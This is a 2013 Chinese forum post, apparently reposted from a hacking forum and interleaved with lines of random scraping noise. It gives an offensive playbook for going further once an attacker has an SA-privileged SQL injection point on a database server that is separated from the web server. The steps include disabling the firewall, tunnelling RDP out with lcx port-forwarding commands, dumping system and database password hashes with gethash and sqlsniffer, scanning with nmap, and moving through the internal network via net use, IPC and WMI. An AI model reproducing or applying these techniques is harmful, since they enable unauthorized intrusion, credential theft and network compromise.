当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。2 o6 @2 F) w' r* _/ M& n7 N
& G5 G$ Q. J8 l3 G
( s0 \. i6 h& c2 Z7 p* Z& W: ?
# u- Q& `, x7 f; I* {+ w1 M
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)6 W2 ^' k+ d. y: c, Z* o* v7 r
, h& B: x) A; n( W7 o
6 `, r8 [3 i7 [( }$ \& e8 j一、DB机有公网IP.
- i( ~4 u/ {: @7 |
# }0 l5 B+ t% Y& Z1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
* b6 e& ]& R2 @7 _, V4 {) r. P z' u
# D- f& r- i- G8 [
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
3 m$ t1 N F- |1 Z: c) q
+ Z9 |# Z$ ]: U7 B% d4 Y O; v$ N; N7 v1 f
5 m- ^& X( ^# J$ p# J# _3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
0 X; q, q5 h( e. ] [* k# D5 C9 T2 S- U9 u, ^6 k
* G% p$ i, } J s2 G4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
X" c2 I* }: U x$ V& H I: X" `3 N; w2 R' j" d7 C1 b
8 Q2 }5 B+ Z4 V n2 J) g1 w7 [
; L( S3 c- o, E0 D9 x# B' j
二、DB机只有内网IP( |9 {7 K# G% A, ~
: ^0 T2 s) X; V
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
" c4 {/ b ^- E1 @- }! {$ j4 Y+ F1 ^& v% G3 G, U8 Q- `1 m
( Q2 x5 T! J: X- F
2:停掉防火墙和IP策略再从内往外扫描.
1 s) P1 ~( F8 I. h; m; T- q6 a3 X3 ], A8 i# w# m
3 M* W8 I; l; F# N p, l. Z/ m3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
& t/ W: @% R" B7 m8 a( d
; Q9 y; m' P/ T. {; Z; l8 {6 o, c* O
4:学会密码规律分析往往会有惊喜.# ]# u. B9 S' |7 ~1 L
k8 d# E Y: K z
1 R/ |3 O' R+ X, E" [0 C5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
# @: I/ I* S& A" g2 Y4 ]. }& k# r; i" h! v( k/ [" s
7 T" j8 l/ d& q" P/ M0 G4 T1 e有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对